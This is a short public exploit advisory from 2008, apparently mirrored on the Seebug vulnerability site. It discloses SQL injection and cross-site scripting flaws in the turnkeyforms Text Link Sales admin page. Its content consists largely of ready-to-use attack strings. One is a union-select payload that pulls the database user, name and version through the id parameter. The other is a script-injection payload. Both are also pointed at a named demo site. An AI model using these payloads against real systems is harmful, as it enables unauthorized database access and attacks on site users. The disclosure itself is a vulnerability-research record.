[~] turnkeyforms Text Link Sales Remote Sql inj & xss [~] [~]---------------------------------------------------------- [~] Discovered By: ZoRLu [~] [~] Date: 14.11.2008 [~] [~] Home: www.z0rlu.blogspot.com [~] [~] contact: trt-turk@hotmail.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] [~] my bug number now: 43 [~] [~] my target bug number: 100 [~] [~] ----------------------------------------------------------- Exploit: sql inj http://localhost/script/admin.php?a=users&id=[SQL] [SQL] 999+union+select+1,user(),database(),version(),5,6,7-- sql for demo: http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7-- xss: http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id="><script>alert()</script> [~]---------------------------------------------------------------------- [~] Greetz tO: str0ke & all Muslim HaCkeRs [~] [~] yildirimordulari.org & darkc0de.com [~] [~]----------------------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论